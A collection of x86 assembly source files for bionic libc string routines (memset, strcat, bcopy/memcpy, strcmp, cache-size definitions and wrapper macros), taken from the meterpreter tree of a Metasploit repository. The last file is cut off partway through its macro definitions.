.int JMPTBL (L(aligned_16_9bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_10bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_11bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_12bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_13bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_14bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_15bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_16bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_17bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_18bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_19bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_20bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_21bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_22bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_23bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_24bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_25bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_26bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_27bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_28bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_29bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_30bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_31bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_32bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_33bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_34bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_35bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_36bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_37bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_38bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_39bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_40bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_41bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_42bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_43bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_44bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_45bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_46bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_47bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_48bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_49bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_50bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_51bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_52bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_53bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_54bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_55bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_56bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_57bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_58bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_59bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_60bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_61bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_62bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_63bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_64bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_65bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_66bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_67bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_68bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_69bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_70bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_71bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_72bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_73bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_74bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_75bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_76bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_77bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_78bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_79bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_80bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_81bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_82bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_83bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_84bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_85bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_86bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_87bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_88bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_89bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_90bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_91bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_92bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_93bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_94bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_95bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_96bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_97bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_98bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_99bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_100bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_101bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_102bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_103bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_104bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_105bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_106bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_107bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_108bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_109bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_110bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_111bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_112bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_113bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_114bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_115bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_116bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_117bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_118bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_119bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_120bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_121bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_122bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_123bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_124bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_125bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_126bytes), L(table_16_128bytes))
.int JMPTBL (L(aligned_16_127bytes), L(table_16_128bytes))
.popsection
ALIGN (4)
L(aligned_16_112bytes):
movdqa %xmm0, -112(%edx)
L(aligned_16_96bytes):
movdqa %xmm0, -96(%edx)
L(aligned_16_80bytes):
movdqa %xmm0, -80(%edx)
L(aligned_16_64bytes):
movdqa %xmm0, -64(%edx)
L(aligned_16_48bytes):
movdqa %xmm0, -48(%edx)
L(aligned_16_32bytes):
movdqa %xmm0, -32(%edx)
L(aligned_16_16bytes):
movdqa %xmm0, -16(%edx)
L(aligned_16_0bytes):
SETRTNVAL
RETURN
ALIGN (4)
L(aligned_16_113bytes):
movdqa %xmm0, -113(%edx)
L(aligned_16_97bytes):
movdqa %xmm0, -97(%edx)
L(aligned_16_81bytes):
movdqa %xmm0, -81(%edx)
L(aligned_16_65bytes):
movdqa %xmm0, -65(%edx)
L(aligned_16_49bytes):
movdqa %xmm0, -49(%edx)
L(aligned_16_33bytes):
movdqa %xmm0, -33(%edx)
L(aligned_16_17bytes):
movdqa %xmm0, -17(%edx)
L(aligned_16_1bytes):
movb %al, -1(%edx)
SETRTNVAL
RETURN
ALIGN (4)
L(aligned_16_114bytes):
movdqa %xmm0, -114(%edx)
L(aligned_16_98bytes):
movdqa %xmm0, -98(%edx)
L(aligned_16_82bytes):
movdqa %xmm0, -82(%edx)
L(aligned_16_66bytes):
movdqa %xmm0, -66(%edx)
L(aligned_16_50bytes):
movdqa %xmm0, -50(%edx)
L(aligned_16_34bytes):
movdqa %xmm0, -34(%edx)
L(aligned_16_18bytes):
movdqa %xmm0, -18(%edx)
L(aligned_16_2bytes):
movw %ax, -2(%edx)
SETRTNVAL
RETURN
ALIGN (4)
L(aligned_16_115bytes):
movdqa %xmm0, -115(%edx)
L(aligned_16_99bytes):
movdqa %xmm0, -99(%edx)
L(aligned_16_83bytes):
movdqa %xmm0, -83(%edx)
L(aligned_16_67bytes):
movdqa %xmm0, -67(%edx)
L(aligned_16_51bytes):
movdqa %xmm0, -51(%edx)
L(aligned_16_35bytes):
movdqa %xmm0, -35(%edx)
L(aligned_16_19bytes):
movdqa %xmm0, -19(%edx)
L(aligned_16_3bytes):
movw %ax, -3(%edx)
movb %al, -1(%edx)
SETRTNVAL
RETURN
ALIGN (4)
L(aligned_16_116bytes):
movdqa %xmm0, -116(%edx)
L(aligned_16_100bytes):
movdqa %xmm0, -100(%edx)
L(aligned_16_84bytes):
movdqa %xmm0, -84(%edx)
L(aligned_16_68bytes):
movdqa %xmm0, -68(%edx)
L(aligned_16_52bytes):
movdqa %xmm0, -52(%edx)
L(aligned_16_36bytes):
movdqa %xmm0, -36(%edx)
L(aligned_16_20bytes):
movdqa %xmm0, -20(%edx)
L(aligned_16_4bytes):
movl %eax, -4(%edx)
SETRTNVAL
RETURN
ALIGN (4)
L(aligned_16_117bytes):
movdqa %xmm0, -117(%edx)
L(aligned_16_101bytes):
movdqa %xmm0, -101(%edx)
L(aligned_16_85bytes):
movdqa %xmm0, -85(%edx)
L(aligned_16_69bytes):
movdqa %xmm0, -69(%edx)
L(aligned_16_53bytes):
movdqa %xmm0, -53(%edx)
L(aligned_16_37bytes):
movdqa %xmm0, -37(%edx)
L(aligned_16_21bytes):
movdqa %xmm0, -21(%edx)
L(aligned_16_5bytes):
movl %eax, -5(%edx)
movb %al, -1(%edx)
SETRTNVAL
RETURN
ALIGN (4)
L(aligned_16_118bytes):
movdqa %xmm0, -118(%edx)
L(aligned_16_102bytes):
movdqa %xmm0, -102(%edx)
L(aligned_16_86bytes):
movdqa %xmm0, -86(%edx)
L(aligned_16_70bytes):
movdqa %xmm0, -70(%edx)
L(aligned_16_54bytes):
movdqa %xmm0, -54(%edx)
L(aligned_16_38bytes):
movdqa %xmm0, -38(%edx)
L(aligned_16_22bytes):
movdqa %xmm0, -22(%edx)
L(aligned_16_6bytes):
movl %eax, -6(%edx)
movw %ax, -2(%edx)
SETRTNVAL
RETURN
ALIGN (4)
L(aligned_16_119bytes):
movdqa %xmm0, -119(%edx)
L(aligned_16_103bytes):
movdqa %xmm0, -103(%edx)
L(aligned_16_87bytes):
movdqa %xmm0, -87(%edx)
L(aligned_16_71bytes):
movdqa %xmm0, -71(%edx)
L(aligned_16_55bytes):
movdqa %xmm0, -55(%edx)
L(aligned_16_39bytes):
movdqa %xmm0, -39(%edx)
L(aligned_16_23bytes):
movdqa %xmm0, -23(%edx)
L(aligned_16_7bytes):
movl %eax, -7(%edx)
movw %ax, -3(%edx)
movb %al, -1(%edx)
SETRTNVAL
RETURN
ALIGN (4)
L(aligned_16_120bytes):
movdqa %xmm0, -120(%edx)
L(aligned_16_104bytes):
movdqa %xmm0, -104(%edx)
L(aligned_16_88bytes):
movdqa %xmm0, -88(%edx)
L(aligned_16_72bytes):
movdqa %xmm0, -72(%edx)
L(aligned_16_56bytes):
movdqa %xmm0, -56(%edx)
L(aligned_16_40bytes):
movdqa %xmm0, -40(%edx)
L(aligned_16_24bytes):
movdqa %xmm0, -24(%edx)
L(aligned_16_8bytes):
movq %xmm0, -8(%edx)
SETRTNVAL
RETURN
ALIGN (4)
L(aligned_16_121bytes):
movdqa %xmm0, -121(%edx)
L(aligned_16_105bytes):
movdqa %xmm0, -105(%edx)
L(aligned_16_89bytes):
movdqa %xmm0, -89(%edx)
L(aligned_16_73bytes):
movdqa %xmm0, -73(%edx)
L(aligned_16_57bytes):
movdqa %xmm0, -57(%edx)
L(aligned_16_41bytes):
movdqa %xmm0, -41(%edx)
L(aligned_16_25bytes):
movdqa %xmm0, -25(%edx)
L(aligned_16_9bytes):
movq %xmm0, -9(%edx)
movb %al, -1(%edx)
SETRTNVAL
RETURN
ALIGN (4)
L(aligned_16_122bytes):
movdqa %xmm0, -122(%edx)
L(aligned_16_106bytes):
movdqa %xmm0, -106(%edx)
L(aligned_16_90bytes):
movdqa %xmm0, -90(%edx)
L(aligned_16_74bytes):
movdqa %xmm0, -74(%edx)
L(aligned_16_58bytes):
movdqa %xmm0, -58(%edx)
L(aligned_16_42bytes):
movdqa %xmm0, -42(%edx)
L(aligned_16_26bytes):
movdqa %xmm0, -26(%edx)
L(aligned_16_10bytes):
movq %xmm0, -10(%edx)
movw %ax, -2(%edx)
SETRTNVAL
RETURN
ALIGN (4)
L(aligned_16_123bytes):
movdqa %xmm0, -123(%edx)
L(aligned_16_107bytes):
movdqa %xmm0, -107(%edx)
L(aligned_16_91bytes):
movdqa %xmm0, -91(%edx)
L(aligned_16_75bytes):
movdqa %xmm0, -75(%edx)
L(aligned_16_59bytes):
movdqa %xmm0, -59(%edx)
L(aligned_16_43bytes):
movdqa %xmm0, -43(%edx)
L(aligned_16_27bytes):
movdqa %xmm0, -27(%edx)
L(aligned_16_11bytes):
movq %xmm0, -11(%edx)
movw %ax, -3(%edx)
movb %al, -1(%edx)
SETRTNVAL
RETURN
ALIGN (4)
L(aligned_16_124bytes):
movdqa %xmm0, -124(%edx)
L(aligned_16_108bytes):
movdqa %xmm0, -108(%edx)
L(aligned_16_92bytes):
movdqa %xmm0, -92(%edx)
L(aligned_16_76bytes):
movdqa %xmm0, -76(%edx)
L(aligned_16_60bytes):
movdqa %xmm0, -60(%edx)
L(aligned_16_44bytes):
movdqa %xmm0, -44(%edx)
L(aligned_16_28bytes):
movdqa %xmm0, -28(%edx)
L(aligned_16_12bytes):
movq %xmm0, -12(%edx)
movl %eax, -4(%edx)
SETRTNVAL
RETURN
ALIGN (4)
L(aligned_16_125bytes):
movdqa %xmm0, -125(%edx)
L(aligned_16_109bytes):
movdqa %xmm0, -109(%edx)
L(aligned_16_93bytes):
movdqa %xmm0, -93(%edx)
L(aligned_16_77bytes):
movdqa %xmm0, -77(%edx)
L(aligned_16_61bytes):
movdqa %xmm0, -61(%edx)
L(aligned_16_45bytes):
movdqa %xmm0, -45(%edx)
L(aligned_16_29bytes):
movdqa %xmm0, -29(%edx)
L(aligned_16_13bytes):
movq %xmm0, -13(%edx)
movl %eax, -5(%edx)
movb %al, -1(%edx)
SETRTNVAL
RETURN
ALIGN (4)
L(aligned_16_126bytes):
movdqa %xmm0, -126(%edx)
L(aligned_16_110bytes):
movdqa %xmm0, -110(%edx)
L(aligned_16_94bytes):
movdqa %xmm0, -94(%edx)
L(aligned_16_78bytes):
movdqa %xmm0, -78(%edx)
L(aligned_16_62bytes):
movdqa %xmm0, -62(%edx)
L(aligned_16_46bytes):
movdqa %xmm0, -46(%edx)
L(aligned_16_30bytes):
movdqa %xmm0, -30(%edx)
L(aligned_16_14bytes):
movq %xmm0, -14(%edx)
movl %eax, -6(%edx)
movw %ax, -2(%edx)
SETRTNVAL
RETURN
ALIGN (4)
L(aligned_16_127bytes):
movdqa %xmm0, -127(%edx)
L(aligned_16_111bytes):
movdqa %xmm0, -111(%edx)
L(aligned_16_95bytes):
movdqa %xmm0, -95(%edx)
L(aligned_16_79bytes):
movdqa %xmm0, -79(%edx)
L(aligned_16_63bytes):
movdqa %xmm0, -63(%edx)
L(aligned_16_47bytes):
movdqa %xmm0, -47(%edx)
L(aligned_16_31bytes):
movdqa %xmm0, -31(%edx)
L(aligned_16_15bytes):
movq %xmm0, -15(%edx)
movl %eax, -7(%edx)
movw %ax, -3(%edx)
movb %al, -1(%edx)
SETRTNVAL
RETURN_END
END (sse2_memset5_atom)
|
OpenWireSec/metasploit | 1,479 | external/source/meterpreter/source/bionic/libc/arch-x86/string/strcat.S | /* $OpenBSD: strcat.S,v 1.8 2005/08/07 11:30:38 espie Exp $ */
/*
* Written by J.T. Conklin <jtc@netbsd.org>.
* Public domain.
*/
#include <machine/asm.h>
#if defined(APIWARN)
#APP
.section .gnu.warning.strcat
.ascii "warning: strcat() is almost always misused, please use strlcat()"
#NO_APP
#endif
/*
* NOTE: I've unrolled the loop eight times: large enough to make a
* significant difference, and small enough not to totally trash the
* cache.
*/
ENTRY(strcat)
pushl %edi /* save edi */
movl 8(%esp),%edi /* dst address */
movl 12(%esp),%edx /* src address */
pushl %edi /* push destination address */
cld /* set search forward */
xorl %eax,%eax /* set search for null terminator */
movl $-1,%ecx /* set search for lots of characters */
repne /* search! */
scasb
leal -1(%edi),%ecx /* correct dst address */
.align 2,0x90
L1: movb (%edx),%al /* unroll loop, but not too much */
movb %al,(%ecx)
testb %al,%al
jz L2
movb 1(%edx),%al
movb %al,1(%ecx)
testb %al,%al
jz L2
movb 2(%edx),%al
movb %al,2(%ecx)
testb %al,%al
jz L2
movb 3(%edx),%al
movb %al,3(%ecx)
testb %al,%al
jz L2
movb 4(%edx),%al
movb %al,4(%ecx)
testb %al,%al
jz L2
movb 5(%edx),%al
movb %al,5(%ecx)
testb %al,%al
jz L2
movb 6(%edx),%al
movb %al,6(%ecx)
testb %al,%al
jz L2
movb 7(%edx),%al
movb %al,7(%ecx)
addl $8,%edx
addl $8,%ecx
testb %al,%al
jnz L1
L2: popl %eax /* pop destination address */
popl %edi /* restore edi */
ret
|
OpenWireSec/metasploit | 2,604 | external/source/meterpreter/source/bionic/libc/arch-x86/string/bcopy.S | /* $OpenBSD: bcopy.S,v 1.5 2005/08/07 11:30:38 espie Exp $ */
/*-
* Copyright (c) 1990 The Regents of the University of California.
* All rights reserved.
*
* This code is derived from locore.s.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. Neither the name of the University nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
#include <machine/asm.h>
/*
* (ov)bcopy (src,dst,cnt)
* ws@tools.de (Wolfgang Solfrank, TooLs GmbH) +49-228-985800
*/
#ifdef MEMCOPY
ENTRY(memcpy)
#else
#ifdef MEMMOVE
ENTRY(memmove)
#else
ENTRY(bcopy)
#endif
#endif
pushl %esi
pushl %edi
#if defined(MEMCOPY) || defined(MEMMOVE)
movl 12(%esp),%edi
movl 16(%esp),%esi
movl %edi, %eax
#else
movl 12(%esp),%esi
movl 16(%esp),%edi
#endif
movl 20(%esp),%ecx
movl %ecx,%edx
cmpl %esi,%edi /* potentially overlapping? */
jnb 1f
cld /* nope, copy forwards. */
shrl $2,%ecx /* copy by words */
rep
movsl
movl %edx,%ecx
andl $3,%ecx /* any bytes left? */
rep
movsb
popl %edi
popl %esi
ret
1:
addl %ecx,%edi /* copy backwards. */
addl %ecx,%esi
std
andl $3,%ecx /* any fractional bytes? */
decl %edi
decl %esi
rep
movsb
movl %edx,%ecx
shrl $2,%ecx
subl $3,%esi
subl $3,%edi
rep
movsl
popl %edi
popl %esi
cld
ret
|
OpenWireSec/metasploit | 1,274 | external/source/meterpreter/source/bionic/libc/arch-x86/string/strcmp.S | /* $OpenBSD: strcmp.S,v 1.3 2005/08/07 11:30:38 espie Exp $ */
/*
* Written by J.T. Conklin <jtc@netbsd.org>.
* Public domain.
*/
#include <machine/asm.h>
/*
* NOTE: I've unrolled the loop eight times: large enough to make a
* significant difference, and small enough not to totally trash the
* cache.
*/
ENTRY(strcmp)
movl 0x04(%esp),%eax
movl 0x08(%esp),%edx
jmp L2 /* Jump into the loop! */
.align 2,0x90
L1: incl %eax
incl %edx
L2: movb (%eax),%cl
testb %cl,%cl /* null terminator??? */
jz L3
cmpb %cl,(%edx) /* chars match??? */
jne L3
incl %eax
incl %edx
movb (%eax),%cl
testb %cl,%cl
jz L3
cmpb %cl,(%edx)
jne L3
incl %eax
incl %edx
movb (%eax),%cl
testb %cl,%cl
jz L3
cmpb %cl,(%edx)
jne L3
incl %eax
incl %edx
movb (%eax),%cl
testb %cl,%cl
jz L3
cmpb %cl,(%edx)
jne L3
incl %eax
incl %edx
movb (%eax),%cl
testb %cl,%cl
jz L3
cmpb %cl,(%edx)
jne L3
incl %eax
incl %edx
movb (%eax),%cl
testb %cl,%cl
jz L3
cmpb %cl,(%edx)
jne L3
incl %eax
incl %edx
movb (%eax),%cl
testb %cl,%cl
jz L3
cmpb %cl,(%edx)
jne L3
incl %eax
incl %edx
movb (%eax),%cl
testb %cl,%cl
jz L3
cmpb %cl,(%edx)
je L1
.align 2, 0x90
L3: movzbl (%eax),%eax /* unsigned comparison */
movzbl (%edx),%edx
subl %edx,%eax
ret
|
OpenWireSec/metasploit | 1,730 | external/source/meterpreter/source/bionic/libc/arch-x86/string/bcopy_wrapper.S | /*
Copyright (c) 2010, Intel Corporation
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#if defined(USE_SSSE3)
# include "cache_wrapper.S"
# undef __i686
# define MEMCPY bcopy
# define USE_AS_MEMMOVE
# define USE_AS_BCOPY
# include "ssse3-memcpy5.S"
#else
# include "bcopy.S"
#endif
|
OpenWireSec/metasploit | 1,793 | external/source/meterpreter/source/bionic/libc/arch-x86/string/cache_wrapper.S | /*
Copyright (c) 2010, Intel Corporation
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/* Values are optimized for Atom */
#define SHARED_CACHE_SIZE (512*1024) /* Atom L2 Cache */
#define DATA_CACHE_SIZE (24*1024) /* Atom L1 Data Cache */
#define SHARED_CACHE_SIZE_HALF (SHARED_CACHE_SIZE / 2)
#define DATA_CACHE_SIZE_HALF (DATA_CACHE_SIZE / 2)
|
OpenWireSec/metasploit | 40,428 | external/source/meterpreter/source/bionic/libc/arch-x86/string/ssse3-memcpy5.S | /*
Copyright (c) 2010, Intel Corporation
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#ifndef MEMCPY
# define MEMCPY ssse3_memcpy5
#endif
#ifndef L
# define L(label) .L##label
#endif
#ifndef ALIGN
# define ALIGN(n) .p2align n
#endif
#ifndef cfi_startproc
# define cfi_startproc .cfi_startproc
#endif
#ifndef cfi_endproc
# define cfi_endproc .cfi_endproc
#endif
#ifndef cfi_rel_offset
# define cfi_rel_offset(reg, off) .cfi_rel_offset reg, off
#endif
#ifndef cfi_restore
# define cfi_restore(reg) .cfi_restore (reg)
#endif
#ifndef cfi_adjust_cfa_offset
# define cfi_adjust_cfa_offset(off) .cfi_adjust_cfa_offset off
#endif
#ifndef ENTRY
# define ENTRY(name) \
.type name, @function; \
.globl name; \
.p2align 4; \
name: \
cfi_startproc
#endif
#ifndef END
# define END(name) \
cfi_endproc; \
.size name, .-name
#endif
#ifdef USE_AS_BCOPY
# define SRC PARMS
# define DEST SRC+4
# define LEN DEST+4
#else
# define DEST PARMS
# define SRC DEST+4
# define LEN SRC+4
#endif
#define CFI_PUSH(REG) \
